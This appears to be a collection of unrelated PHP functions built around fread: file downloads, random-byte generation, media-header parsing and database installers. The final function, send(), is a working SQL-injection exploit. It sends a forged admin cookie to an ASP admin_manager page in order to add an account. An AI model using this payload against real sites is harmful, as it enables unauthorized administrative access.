private function getRandomBytes($count) { $bytes = ''; if (function_exists('openssl_random_pseudo_bytes') && strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN') { // OpenSSL slow on Win $bytes = openssl_random_pseudo_bytes($count); } if ($bytes === '' && @is_readable('/dev/urandom') && ($hRand = @fopen('/dev/urandom', 'rb')) !== FALSE) { $bytes = fread($hRand, $count); fclose($hRand); } if (strlen($bytes) < $count) { $bytes = ''; if ($this->randomState === null) { $this->randomState = microtime(); if (function_exists('getmypid')) { $this->randomState .= getmypid(); } } for ($i = 0; $i < $count; $i += 16) { $this->randomState = md5(microtime() . $this->randomState); if (PHP_VERSION >= '5') { $bytes .= md5($this->randomState, true); } else { $bytes .= pack('H*', md5($this->randomState)); } } $bytes = substr($bytes, 0, $count); } return $bytes; }
public static function isXliff($stringData = null, $fullPathToFile = null) { self::_reset(); $info = array(); if (!empty($stringData) && empty($fullPathToFile)) { $stringData = substr($stringData, 0, 1024); } elseif (empty($stringData) && !empty($fullPathToFile)) { $info = FilesStorage::pathinfo_fix($fullPathToFile); $file_pointer = fopen("{$fullPathToFile}", 'r'); // Checking Requirements (By specs, I know that xliff version is in the first 1KB) $stringData = fread($file_pointer, 1024); fclose($file_pointer); } elseif (!empty($stringData) && !empty($fullPathToFile)) { //we want to check extension and content $info = FilesStorage::pathinfo_fix($fullPathToFile); } self::$fileType['info'] = $info; //we want to check extension also if file path is specified if (!empty($info) && !self::isXliffExtension()) { //THIS IS NOT an xliff return false; } // preg_match( '|<xliff\s.*?version\s?=\s?["\'](.*?)["\'](.*?)>|si', $stringData, $tmp ); if (!empty($stringData)) { return array($stringData); } return false; }
protected function downFile($path, $file_name) { header("Content-type:text/html;charset=utf-8"); // echo $path,$file_name; //中文兼容 $file_name = iconv("utf-8", "gb2312", $file_name); //获取网站根目录,这里可以换成你的下载目录 $file_sub_path = $path; $file_path = $file_sub_path . $file_name; //判断文件是否存在 if (!file_exists($file_path)) { echo '文件不存在'; return; } $fp = fopen($file_path, "r"); $file_size = filesize($file_path); //下载文件所需的header申明 Header("Content-type: application/octet-stream"); Header("Accept-Ranges: bytes"); Header("Accept-Length:" . $file_size); Header("Content-Disposition: attachment; filename=" . $file_name); $buffer = 1024; $file_count = 0; //返回数据到浏览器 while (!feof($fp) && $file_count < $file_size) { $file_con = fread($fp, $buffer); $file_count += $buffer; echo $file_con; } fclose($fp); }
public static function readRoutes($url, $params = array()) { if (isset(self::$routes)) { } else { $filename = $_SERVER["DOCUMENT_ROOT"] . "/Init/routing.prop"; $f = fopen($filename, "r"); $r = fread($f, filesize($filename)); $prop = explode("\n", $r); #print_r($prop); for ($i = 0; $i < count($prop); $i++) { if (substr($prop[$i], 0, 4) != " ") { continue; } $params = array(); $row = true; while ($row) { $row = self::readRoutingRow($prop[$i++]); if ($row) { $params[$row[0]] = $row[1]; } } $i--; if (self::checkMe($url, $params)) { break; } } } }
function fsize($file) { // filesize will only return the lower 32 bits of // the file's size! Make it unsigned. $fmod = filesize($file); if ($fmod < 0) { $fmod += 2.0 * (PHP_INT_MAX + 1); } // find the upper 32 bits $i = 0; $myfile = fopen($file, "r"); // feof has undefined behaviour for big files. // after we hit the eof with fseek, // fread may not be able to detect the eof, // but it also can't read bytes, so use it as an // indicator. while (strlen(fread($myfile, 1)) === 1) { fseek($myfile, PHP_INT_MAX, SEEK_CUR); $i++; } fclose($myfile); // $i is a multiplier for PHP_INT_MAX byte blocks. // return to the last multiple of 4, as filesize has modulo of 4 GB (lower 32 bits) if ($i % 2 == 1) { $i--; } // add the lower 32 bit to our PHP_INT_MAX multiplier return (double) $i * (PHP_INT_MAX + 1) + $fmod; }
function final_extract_install() { global $CONFIG, $lang_plugin_final_extract, $lang_plugin_final_extract_config, $thisplugin; require 'plugins/final_extract/configuration.php'; require 'include/sql_parse.php'; if (!isset($CONFIG['fex_enable'])) { $query = "INSERT INTO " . $CONFIG['TABLE_CONFIG'] . " VALUES ('fex_enable', '1');"; cpg_db_query($query); // create table $db_schema = $thisplugin->fullpath . '/schema.sql'; $sql_query = fread(fopen($db_schema, 'r'), filesize($db_schema)); $sql_query = preg_replace('/CPG_/', $CONFIG['TABLE_PREFIX'], $sql_query); $sql_query = remove_remarks($sql_query); $sql_query = split_sql_file($sql_query, ';'); foreach ($sql_query as $q) { cpg_db_query($q); } // Put default setting $db_schema = $thisplugin->fullpath . '/basic.sql'; $sql_query = fread(fopen($db_schema, 'r'), filesize($db_schema)); $sql_query = preg_replace('/CPG_/', $CONFIG['TABLE_PREFIX'], $sql_query); $sql_query = remove_remarks($sql_query); $sql_query = split_sql_file($sql_query, ';'); foreach ($sql_query as $q) { cpg_db_query($q); } } return true; }
function mci_file_read_local($p_diskfile) { $t_handle = fopen($p_diskfile, "r"); $t_content = fread($t_handle, filesize($p_diskfile)); fclose($t_handle); return $t_content; }
/** * Get the specified number of random bytes. * * Attempts to use a cryptographically secure (not predictable) * source of randomness if available. If there is no high-entropy * randomness source available, it will fail. As a last resort, * for non-critical systems, define * <code>Auth_OpenID_RAND_SOURCE</code> as <code>null</code>, and * the code will fall back on a pseudo-random number generator. * * @param int $num_bytes The length of the return value * @return string $bytes random bytes */ function getBytes($num_bytes) { static $f = null; $bytes = ''; if ($f === null) { if (Auth_OpenID_RAND_SOURCE === null) { $f = false; } else { $f = @fopen(Auth_OpenID_RAND_SOURCE, "r"); if ($f === false) { $msg = 'Define Auth_OpenID_RAND_SOURCE as null to ' . ' continue with an insecure random number generator.'; trigger_error($msg, E_USER_ERROR); } } } if ($f === false) { // pseudorandom used $bytes = ''; for ($i = 0; $i < $num_bytes; $i += 4) { $bytes .= pack('L', mt_rand()); } $bytes = substr($bytes, 0, $num_bytes); } else { $bytes = fread($f, $num_bytes); } return $bytes; }
function downloadToString() { $crlf = "\r\n"; // generate request $req = 'GET ' . $this->_uri . ' HTTP/1.0' . $crlf . 'Host: ' . $this->_host . $crlf . $crlf; // fetch $this->_fp = fsockopen(($this->_protocol == 'https' ? 'ssl://' : '') . $this->_host, $this->_port); fwrite($this->_fp, $req); while (is_resource($this->_fp) && $this->_fp && !feof($this->_fp)) { $response .= fread($this->_fp, 1024); } fclose($this->_fp); // split header and body $pos = strpos($response, $crlf . $crlf); if ($pos === false) { return $response; } $header = substr($response, 0, $pos); $body = substr($response, $pos + 2 * strlen($crlf)); // parse headers $headers = array(); $lines = explode($crlf, $header); foreach ($lines as $line) { if (($pos = strpos($line, ':')) !== false) { $headers[strtolower(trim(substr($line, 0, $pos)))] = trim(substr($line, $pos + 1)); } } // redirection? if (isset($headers['location'])) { $http = new ilHttpRequest($headers['location']); return $http->DownloadToString($http); } else { return $body; } }
/** * @test */ public function canReadFromLargeFile() { $fp = fopen($this->largeFile->url(), 'rb'); $data = fread($fp, 15); fclose($fp); $this->assertEquals(str_repeat(' ', 15), $data); }
/** Upload a profile picture for the group */ function save_picture($ext) { global $cfg; if (!$this->user->logged_in() || !$this->user->group) { throw new Exception("Access denied!"); } if (!isset($_SERVER["CONTENT_LENGTH"])) { throw new Exception("Invalid parameters"); } $size = (int) $_SERVER["CONTENT_LENGTH"]; $file_name = rand() . time() . "{$this->user->id}.{$ext}"; $file_path = "{$cfg['dir']['content']}{$file_name}"; // Write the new one $input = fopen("php://input", "rb"); $output = fopen($file_path, "wb"); if (!$input || !$output) { throw new Exception("Cannot open files!"); } while ($size > 0) { $data = fread($input, $size > 1024 ? 1024 : $size); $size -= 1024; fwrite($output, $data); } fclose($input); fclose($output); // Update the profile image $this->group->update($this->user->group, array('picture' => $file_name)); }
/** * @return bool */ public function analyze() { $info =& $this->getid3->info; fseek($this->getid3->fp, $info['avdataoffset'], SEEK_SET); $EXEheader = fread($this->getid3->fp, 28); $magic = 'MZ'; if (substr($EXEheader, 0, 2) != $magic) { $info['error'][] = 'Expecting "' . Helper::PrintHexBytes($magic) . '" at offset ' . $info['avdataoffset'] . ', found "' . Helper::PrintHexBytes(substr($EXEheader, 0, 2)) . '"'; return false; } $info['fileformat'] = 'exe'; $info['exe']['mz']['magic'] = 'MZ'; $info['exe']['mz']['raw']['last_page_size'] = Helper::LittleEndian2Int(substr($EXEheader, 2, 2)); $info['exe']['mz']['raw']['page_count'] = Helper::LittleEndian2Int(substr($EXEheader, 4, 2)); $info['exe']['mz']['raw']['relocation_count'] = Helper::LittleEndian2Int(substr($EXEheader, 6, 2)); $info['exe']['mz']['raw']['header_paragraphs'] = Helper::LittleEndian2Int(substr($EXEheader, 8, 2)); $info['exe']['mz']['raw']['min_memory_paragraphs'] = Helper::LittleEndian2Int(substr($EXEheader, 10, 2)); $info['exe']['mz']['raw']['max_memory_paragraphs'] = Helper::LittleEndian2Int(substr($EXEheader, 12, 2)); $info['exe']['mz']['raw']['initial_ss'] = Helper::LittleEndian2Int(substr($EXEheader, 14, 2)); $info['exe']['mz']['raw']['initial_sp'] = Helper::LittleEndian2Int(substr($EXEheader, 16, 2)); $info['exe']['mz']['raw']['checksum'] = Helper::LittleEndian2Int(substr($EXEheader, 18, 2)); $info['exe']['mz']['raw']['cs_ip'] = Helper::LittleEndian2Int(substr($EXEheader, 20, 4)); $info['exe']['mz']['raw']['relocation_table_offset'] = Helper::LittleEndian2Int(substr($EXEheader, 24, 2)); $info['exe']['mz']['raw']['overlay_number'] = Helper::LittleEndian2Int(substr($EXEheader, 26, 2)); $info['exe']['mz']['byte_size'] = ($info['exe']['mz']['raw']['page_count'] - 1) * 512 + $info['exe']['mz']['raw']['last_page_size']; $info['exe']['mz']['header_size'] = $info['exe']['mz']['raw']['header_paragraphs'] * 16; $info['exe']['mz']['memory_minimum'] = $info['exe']['mz']['raw']['min_memory_paragraphs'] * 16; $info['exe']['mz']['memory_recommended'] = $info['exe']['mz']['raw']['max_memory_paragraphs'] * 16; $info['error'][] = 'EXE parsing not enabled in this version of GetId3Core() [' . $this->getid3->version() . ']'; return false; }
public static function echoFileContent($filename) { $handle = fopen($filename, "r"); $contents = fread($handle, filesize($filename)); fclose($handle); echo $contents; }
function file_to_str($file, $size) { $link = start_nchsls(); $fd = fopen($file, 'r'); $str = fread($fd, $size); return mysql_real_escape_string($str, $link); }
function httpGet($host, $base_fd) { global $index; $fd = stream_socket_client("{$host}", $errno, $errstr, 3, STREAM_CLIENT_ASYNC_CONNECT | STREAM_CLIENT_CONNECT); $index[$fd] = 0; $event_fd = event_new(); event_set($event_fd, $fd, EV_WRITE | EV_PERSIST, function ($fd, $events, $arg) use($host) { global $times, $limit, $index; if (!$index[$fd]) { $index[$fd] = 1; $out = "GET / HTTP/1.1\r\n"; $out .= "Host: {$host}\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fd, $out); } else { $str = fread($fd, 4096); echo $str, PHP_EOL; if (feof($fd)) { fclose($fd); $times++; echo "done\n"; if ($times == $limit - 1) { event_base_loopexit($arg[1]); } } } }, array($event_fd, $base_fd)); event_base_set($event_fd, $base_fd); event_add($event_fd); }
public function getDocuments($name) { if (!file_exists($this->_getFilePathName($name))) { return array(); } $fp = fopen($this->_getFilePathName($name), 'r'); $filesize = filesize($this->_getFilePathName($name)); if ($filesize % MULTIINDEX_DOCUMENTBYTESIZE != 0) { throw new Exception('Filesize not correct index is corrupt!'); } $ret = array(); $count = 0; for ($i = 0; $i < $filesize / MULTIINDEX_DOCUMENTBYTESIZE; $i++) { $bindata1 = fread($fp, MULTIINDEX_DOCUMENTINTEGERBYTESIZE); $bindata2 = fread($fp, MULTIINDEX_DOCUMENTINTEGERBYTESIZE); $bindata3 = fread($fp, MULTIINDEX_DOCUMENTINTEGERBYTESIZE); $data1 = unpack('i', $bindata1); $data2 = unpack('i', $bindata2); $data3 = unpack('i', $bindata3); $ret[] = array($data1[1], $data2[1], $data3[1]); $count++; if ($count == MULTIINDEX_DOCUMENTRETURN) { break; } } fclose($fp); return $ret; }
public function signature_split($orgfile, $input) { $info = unpack('n', fread($input, 2)); $blocksize = $info[1]; $this->info['transferid'] = mt_rand(); $count = 0; $needed = array(); $cache = $this->getCache(); $prefix = $this->getPrefix(); while (!feof($orgfile)) { $new_md5 = fread($input, 16); if (feof($input)) { break; } $data = fread($orgfile, $blocksize); $org_md5 = md5($data, true); if ($org_md5 == $new_md5) { $cache->set($prefix . $count, $data); } else { $needed[] = $count; } $count++; } return array('transferid' => $this->info['transferid'], 'needed' => $needed, 'count' => $count); }
public static function download($fullPath) { if ($fd = fopen($fullPath, 'r')) { $fsize = filesize($fullPath); $path_parts = pathinfo($fullPath); $ext = strtolower($path_parts['extension']); switch ($ext) { case 'pdf': header('Content-type: application/pdf'); // add here more headers for diff. extensions header('Content-Disposition: attachment; filename="' . $path_parts['basename'] . '"'); // use 'attachment' to force a download break; default: header('Content-type: application/octet-stream'); header('Content-Disposition: filename="' . $path_parts['basename'] . '"'); break; } header("Content-length: {$fsize}"); header('Cache-control: private'); //use this to open files directly while (!feof($fd)) { $buffer = fread($fd, 2048); echo $buffer; } } fclose($fd); }
function form_save() { if (isset($_POST["save_component_import"])) { if (trim($_POST["import_text"] != "")) { /* textbox input */ $xml_data = $_POST["import_text"]; } elseif ($_FILES["import_file"]["tmp_name"] != "none" && $_FILES["import_file"]["tmp_name"] != "") { /* file upload */ $fp = fopen($_FILES["import_file"]["tmp_name"], "r"); $xml_data = fread($fp, filesize($_FILES["import_file"]["tmp_name"])); fclose($fp); } else { header("Location: templates_import.php"); exit; } if ($_POST["import_rra"] == "1") { $import_custom_rra_settings = false; } else { $import_custom_rra_settings = true; } /* obtain debug information if it's set */ $debug_data = import_xml_data($xml_data, $import_custom_rra_settings); if (sizeof($debug_data) > 0) { $_SESSION["import_debug_info"] = $debug_data; } header("Location: templates_import.php"); } }
/** * Return an CT file for download */ function churchcore__filedownload() { global $files_dir; include_once CHURCHCORE . "/churchcore_db.php"; $mime_types = getMimeTypes(); $file = db_query("select * from {cc_file} f where f.id=:id and filename=:filename", array(":id" => $_GET["id"], ":filename" => $_GET["filename"]))->fetch(); $filename = "{$files_dir}/files/{$file->domain_type}/{$file->domain_id}/{$file->filename}"; $handle = fopen($filename, "rb"); if ($handle == false) { echo "Die Datei konnte nicht gefunden werden!"; } else { $contents = fread($handle, filesize($filename)); fclose($handle); if (isset($mime_types[substr(strrchr($filename, '.'), 1)])) { drupal_add_http_header('Content-Type', $mime_types[substr(strrchr($filename, '.'), 1)], false); } else { drupal_add_http_header('Content-Type', 'application/unknown', false); } if (isset($_GET["type"]) && $_GET["type"] == "download") { drupal_add_http_header('Content-Disposition', 'attachment;filename="' . $file->bezeichnung . '"', false); } else { drupal_add_http_header('Content-Disposition', 'inline;filename="' . $file->bezeichnung . '"', false); } drupal_add_http_header('Cache-Control', 'must-revalidate, post-check=0, pre-check=0', false); drupal_add_http_header('Cache-Control', 'private', true); $content = drupal_get_header(); echo $contents; } }
function execute($cmd, &$output, &$error, &$returnCode) { $descriptorspec = array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')); $process = proc_open($cmd, $descriptorspec, $pipes); if (!is_resource($process)) { throw new RuntimeException("Unable to execute the command. [{$cmd}]"); } stream_set_blocking($pipes[1], false); stream_set_blocking($pipes[2], false); $output = $error = ''; foreach ($pipes as $key => $pipe) { while (!feof($pipe)) { if (!($line = fread($pipe, 128))) { continue; } if (1 == $key) { $output .= $line; // stdout } else { $error .= $line; // stderr } } fclose($pipe); } $returnCode = proc_close($process); }
public static function processemail($emailsrc, $pdfout, $coverfile = '') { $combfilelist = array(); # Process the email $emailparts = Mail_mimeDecode::decode(array('include_bodies' => true, 'decode_bodies' => true, 'decode_headers' => true, 'input' => file_get_contents($emailsrc), 'crlf' => "\r\n")); # Process the cover if it exists if ($coverfile !== '') { $combfilelist[] = self::processpart(file_get_contents($coverfile), mime_content_type($coverfile)); } # Process the parts $combfilelist = array_merge($combfilelist, self::processparts($emailparts)); # Create an intermediate file to build the pdf $tmppdffilename = sys_get_temp_dir() . '/e2p-' . (string) abs((int) (microtime(true) * 100000)) . '.pdf'; # Build the command to combine all of the intermediate files into one $conbcom = str_replace(array_merge(array('INTFILE', 'COMBLIST'), array_keys(self::$driver_paths)), array_merge(array($tmppdffilename, implode(' ', $combfilelist)), array_values(self::$driver_paths)), self::$mime_drivers['gs']); exec($conbcom); # Remove the intermediate files foreach ($combfilelist as $combfilename) { unlink($combfilename); } # Write the intermediate file to the final destination $intfileres = fopen($tmppdffilename, 'rb'); $outfileres = fopen($pdfout, 'ab'); while (!feof($intfileres)) { fwrite($outfileres, fread($intfileres, 8192)); } fclose($intfileres); fclose($outfileres); # Remove the intermediate file unlink($tmppdffilename); }
public function dwld() { $this->min(); if (is_numeric($this->getParam("id"))) { $this->download->newDownload(); if ($this->download->getIsLocal()) { $url = OWEB_DIR_DATA . "/downloads/" . $this->download->getUrl(); header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($url) . '";'); readfile($url); } else { $url = OWEB_DIR_DATA . "/downloads/" . $this->download->getUrl(); header("Content-Disposition: attachment; filename=" . basename($url)); header("Content-Type: application/force-download"); header("Content-Type: application/octet-stream"); header("Content-Type: application/download"); header("Content-Description: File Transfer"); header("Content-Length: " . filesize($url)); flush(); // this doesn't really matter. $fp = fopen($url, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); // this is essential for large downloads } fclose($fp); } } else { throw new \Model\downloads\exception\DownloadCantBeFind("No Download ID given"); } }
/** * _read * * @param int $bytes Bytes to read * * @access private * @return mixed */ function _read($bytes = 1) { if (0 < ($bytes = abs($bytes))) { return fread($this->_handle, $bytes); } return null; }
/** * @param $file_name * @return array * @throws ApplicationException */ public static function generate($file_name) { set_time_limit(0); $temp_file = TempFileProvider::generate("peaks", ".raw"); $command = sprintf("%s -v quiet -i %s -ac 1 -f u8 -ar 11025 -acodec pcm_u8 %s", self::$ffmpeg_cmd, escapeshellarg($file_name), escapeshellarg($temp_file)); shell_exec($command); if (!file_exists($temp_file)) { throw new ApplicationException("Waveform could not be generated!"); } $chunk_size = ceil(filesize($temp_file) / self::PEAKS_RESOLUTION); $peaks = withOpenedFile($temp_file, "r", function ($fh) use(&$chunk_size) { while ($data = fread($fh, $chunk_size)) { $peak = 0; $array = str_split($data); foreach ($array as $item) { $code = ord($item); if ($code > $peak) { $peak = $code; } if ($code == 255) { break; } } (yield $peak - 127); } }); TempFileProvider::delete($temp_file); return $peaks; }
/** * Task to run pending migrations * * @return null */ protected function _execute(array $params) { $migrations = new MigrationManager(); Database::$default = $params['db']; $this->db = Database::instance(); $db_config = Kohana::$config->load('database')->{$params['db']}; if (!ORM::factory('Migration')->is_installed()) { /** * Get platform from database config */ $platform = strtolower($db_config['type']); if ('mysqli' == $platform) { $platform = 'mysql'; } /** * Get SQL from file for selected platform */ $file = realpath(substr(__DIR__, 0, strlen(__DIR__) - strlen('classes/Task/Db')) . 'sql/' . $platform . '.sql'); $handle = fopen($file, 'rb'); $sql_create = fread($handle, filesize($file)); $this->db->query(0, $sql_create); $msg = Minion_CLI::color("-----------------------------\n", 'green'); $msg .= Minion_CLI::color("| Migration table create!!! |\n", 'green'); $msg .= Minion_CLI::color("-----------------------------\n", 'green'); Minion_CLI::write($msg); } $migrations->migrate($params['db'], $params['step']); }
/** * Detect HTML in the first KB to prevent against potential security issue with * IE/Safari/Opera file type auto detection bug. * Returns true if file contain insecure HTML code at the beginning. * * @param string $filePath absolute path to file * @return boolean */ function DetectHtml($filePath) { $fp = fopen($filePath, 'rb'); $chunk = fread($fp, 1024); fclose($fp); $chunk = strtolower($chunk); if (!$chunk) { return false; } $chunk = trim($chunk); if (preg_match("/<!DOCTYPE\\W*X?HTML/sim", $chunk)) { return true; } $tags = array('<body', '<head', '<html', '<img', '<pre', '<script', '<table', '<title'); foreach ($tags as $tag) { if (false !== strpos($chunk, $tag)) { return true; } } //type = javascript if (preg_match('!type\\s*=\\s*[\'"]?\\s*(?:\\w*/)?(?:ecma|java)!sim', $chunk)) { return true; } //href = javascript //src = javascript //data = javascript if (preg_match('!(?:href|src|data)\\s*=\\s*[\'"]?\\s*(?:ecma|java)script:!sim', $chunk)) { return true; } //url(javascript if (preg_match('!url\\s*\\(\\s*[\'"]?\\s*(?:ecma|java)script:!sim', $chunk)) { return true; } return false; }
function avmaker_configure($stop = true) { global $errors, $CONFIG; require 'include/sql_parse.php'; $db_update = 'plugins/avmaker/sql/basic.sql'; $sql_query = fread(fopen($db_update, 'r'), filesize($db_update)); // Update table prefix $sql_query = preg_replace('/CPG_/', $CONFIG['TABLE_PREFIX'], $sql_query); $sql_query = remove_remarks($sql_query); $sql_query = split_sql_file($sql_query, ';'); ?> <h2>Performing Database Updates<h2> <table class="maintable"> <?php foreach ($sql_query as $q) { echo "<tr><td class='debug_text' style='color: black;'>\r\n\t\t{$q}\r\n\t\t</td>"; if (mysql_query($q)) { echo "<td class='debug_text' style='color: green;'>OK</td></tr>"; } else { echo "<td class='debug_text' style='color: black;'>Already Done</td></tr>"; } } echo "</table>"; if ($stop) { echo <<<EOT <form action="{$_SERVER['REQUEST_URI']}" method="post"> <input type="submit" value="Go!" name="submit" /> </form> EOT; } }
function send($cmd) { global $host, $path; $message = "POST " . $path . "admin/admin_manager.asp?action=add HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Referer: http://{$host}{$path}\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: securitylab\r\n"; $message .= "X-Forwarded-For:1.1.1.1\r\n"; $message .= "Host: {$host}\r\n"; $message .= "Content-Length: " . strlen($cmd) . "\r\n"; $message .= "Cookie: m_username=securitylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin; m_level=0; checksecuritylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin=cf144fd7a325d1088456838f524ae9d7\r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; echo $message; $fp = fsockopen($host, 80); fputs($fp, $message); $resp = ''; while ($fp && !feof($fp)) { $resp .= fread($fp, 1024); } echo $resp; return $resp; }